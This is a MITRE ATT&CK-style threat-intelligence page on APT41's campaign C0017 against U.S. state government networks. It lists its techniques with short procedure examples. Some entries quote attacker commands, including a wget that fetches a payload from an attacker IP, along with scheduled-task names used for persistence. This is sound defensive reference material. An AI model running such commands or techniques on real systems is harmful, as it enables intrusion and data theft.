C0017

C0017

Campaign, May 2021 to Feb 2022.View on attack.mitre.org

About this campaign

C0017 was an APT41 campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During C0017, APT41 was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of C0017 are unknown, however APT41 was observed exfiltrating Personal Identifiable Information (PII).

Techniques used29

Procedure examples29

TechniqueProcedure example
T1001.003
Protocol or Service Impersonation

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.

T1003.002
Security Account Manager

During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.

T1005
Data from Local System

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.

T1016
System Network Configuration Discovery

During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery.

T1027
Obfuscated Files or Information

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.

T1027.002
Software Packing

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.

T1033
System Owner/User Discovery

During C0017, APT41 used `whoami` to gather information from victim machines.

T1036.004
Masquerade Task or Service

During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.

T1036.005
Match Legitimate Resource Name or Location

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.

T1041
Exfiltration Over C2 Channel

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.

T1048.003
Exfiltration Over Unencrypted Non-C2 Protocol

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.

T1053.005
Scheduled Task

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.

T1059.003
Windows Command Shell

During C0017, APT41 used `cmd.exe` to execute reconnaissance commands.

T1059.007
JavaScript

During C0017, APT41 deployed JScript web shells on compromised systems.

T1071.001
Web Protocols

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.

View all 29 procedure examples

Attributed groups1

Software6

References1

  1. Mandiant APT41 Open source
    Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.